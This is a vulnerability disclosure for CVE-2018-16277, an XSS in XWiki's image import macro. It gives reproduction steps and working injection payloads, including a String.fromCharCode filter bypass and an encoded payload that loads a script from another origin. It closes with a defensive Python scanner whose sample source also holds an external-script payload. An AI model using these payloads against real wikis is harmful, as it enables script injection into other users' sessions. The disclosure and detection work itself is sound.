CVE-2018-16277 – XSS in XWiki

At the beginning of September I found an XSS vulnerability in the XWiki image import function. A short explanation of the vulnerability is below.

Description:
There's an XSS in the image import function (image:). It's available only to logged-in users who are allowed to create new posts. XWiki up to 10.7 (the most recent version so far) is vulnerable to this attack.

Steps to reproduce the bug:

  1. Go to page editing (for example: https://playground.xwiki.org/xwiki/bin/edit/Sandbox/WebHome)
  2. Select the "Source" button
  3. In the source, enter your payload:
[[image:testpayload||alt="" width="1" height="1" onerror="alert(document.location)"]]

  4. Click "Preview" (it's better to click Preview than Save & View, because Save & View will overwrite the XWiki page and you won't be able to revert the changes if you use document.write() in your payload)
  5. There's your XSS!


This XSS is quite limited, because you can't use characters like:

"  '  / :  ;

in your payload, but there's always a way around such limitations. In this case you can use a combination of two JS functions: document.write() and String.fromCharCode().

Take a look at this piece of code:

[[image:testpayload||alt="" width="1" height="1" onerror="document.write(String.fromCharCode(65,32,66,32,67,32))"]]

(this payload will overwrite the whole XWiki page with "A B C")

Thanks to String.fromCharCode(), you can craft any payload you want.

You can also include scripts from other origins!

Here's a payload that will open a calculator app using a script from another origin:

[[image:testpayload||alt="" width="1" height="1" onerror="document.write(String.fromCharCode(60, 112, 32, 100, 97, 116, 97, 45, 104, 101, 105, 103, 104, 116, 61, 34, 50, 54, 53, 34, 32, 100, 97, 116, 97, 45, 116, 104, 101, 109, 101, 45, 105, 100, 61, 34, 100, 97, 114, 107, 34, 32, 100, 97, 116, 97, 45, 115, 108, 117, 103, 45, 104, 97, 115, 104, 61, 34, 118, 105, 111, 116, 74, 34, 32, 100, 97, 116, 97, 45, 100, 101, 102, 97, 117, 108, 116, 45, 116, 97, 98, 61, 34, 104, 116, 109, 108, 44, 114, 101, 115, 117, 108, 116, 34, 32, 100, 97, 116, 97, 45, 117, 115, 101, 114, 61, 34, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 34, 32, 100, 97, 116, 97, 45, 112, 101, 110, 45, 116, 105, 116, 108, 101, 61, 34, 65, 32, 74, 97, 118, 97, 83, 99, 114, 105, 112, 116, 32, 67, 97, 108, 99, 117, 108, 97, 116, 111, 114, 34, 32, 100, 97, 116, 97, 45, 112, 114, 101, 118, 105, 101, 119, 61, 34, 116, 114, 117, 101, 34, 32, 99, 108, 97, 115, 115, 61, 34, 99, 111, 100, 101, 112, 101, 110, 34, 62, 83, 101, 101, 32, 116, 104, 101, 32, 80, 101, 110, 32, 60, 97, 32, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 47, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 47, 112, 101, 110, 47, 118, 105, 111, 116, 74, 47, 34, 62, 65, 32, 74, 97, 118, 97, 83, 99, 114, 105, 112, 116, 32, 67, 97, 108, 99, 117, 108, 97, 116, 111, 114, 60, 47, 97, 62, 32, 98, 121, 32, 74, 111, 115, 104, 32, 83, 109, 105, 116, 104, 32, 40, 60, 97, 32, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 47, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 34, 62, 64, 106, 111, 115, 104, 115, 109, 105, 116, 104, 48, 49, 60, 47, 97, 62, 41, 32, 111, 110, 32, 60, 97, 32, 104, 114, 101, 102, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 34, 62, 67, 111, 100, 101, 80, 101, 110, 60, 47, 97, 62, 46, 60, 47, 112, 62, 10, 60, 115, 99, 114, 105, 112, 
116, 32, 97, 115, 121, 110, 99, 32, 115, 114, 99, 61, 34, 104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 105, 99, 46, 99, 111, 100, 101, 112, 101, 110, 46, 105, 111, 47, 97, 115, 115, 101, 116, 115, 47, 101, 109, 98, 101, 100, 47, 101, 105, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62))"]]


PoC (Firefox Quantum 62.0) (if the calculator doesn't show, refresh the page)
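From the defender's side, the two things worth catching in stored page source are an event-handler parameter on an image macro and a String.fromCharCode() chain that hides what the handler really does. The scanner below is an added example written for this post, not XWiki's own code: it parses [[image:...||...]] macros, expands any fromCharCode calls, and flags handlers, obfuscation, and decoded payloads that pull a script from another origin. The sample page source is constructed; the x.invalid host is a placeholder.

```python
import re

# XWiki 2.x image macro: [[image:reference||name="value" name2="value"]]
IMAGE_RE = re.compile(r'\[\[image:(?P<ref>[^|\]]*)(?:\|\|(?P<params>[^\]]*))?\]\]')
# name="value" parameter pairs (double-quoted values, as in the PoC above)
PARAM_RE = re.compile(r'(?P<name>[A-Za-z_:-]+)\s*=\s*"(?P<value>[^"]*)"')
# String.fromCharCode(65, 32, ...) calls used to smuggle the filtered characters
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d\s,]*)\)')

# Constructed sample page source: one benign image, the alert() PoC, and a
# fromCharCode payload that decodes to <script src=//x.invalid/a.js></script>.
SAMPLE_PAGE = '''
[[image:logo.png||alt="Project logo" width="120"]]
[[image:testpayload||alt="" width="1" height="1" onerror="alert(document.location)"]]
[[image:testpayload||alt="" width="1" height="1" onerror="document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,47,47,120,46,105,110,118,97,108,105,100,47,97,46,106,115,62,60,47,115,99,114,105,112,116,62))"]]
'''

def decode_fromcharcode(value):
    """Expand every String.fromCharCode(...) call in value to the text it builds."""
    return FROMCHARCODE_RE.sub(
        lambda m: ''.join(chr(int(n)) for n in m.group(1).split(',') if n.strip()),
        value)

def scan_image_macros(source):
    """Return (reference, parameter, reason) findings for risky image parameters."""
    findings = []
    for macro in IMAGE_RE.finditer(source):
        ref = macro.group('ref')
        for p in PARAM_RE.finditer(macro.group('params') or ''):
            name, value = p.group('name').lower(), p.group('value')
            decoded = decode_fromcharcode(value)
            if name.startswith('on'):           # onerror, onload, ... must never be rendered
                findings.append((ref, name, 'event-handler attribute'))
            if decoded != value:                # obfuscation that defeats the character filter
                findings.append((ref, name, 'String.fromCharCode obfuscation'))
            if re.search(r'<script[^>]*\ssrc=', decoded, re.I):
                findings.append((ref, name, 'decoded payload loads an external script'))
    return findings

if __name__ == '__main__':
    for ref, name, reason in scan_image_macros(SAMPLE_PAGE):
        print(f'{ref}: parameter {name!r} flagged: {reason}')
```

The same decode step is what you want in triage: expanding the char codes turns the long number list from the PoC above into readable HTML before deciding what it loads.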
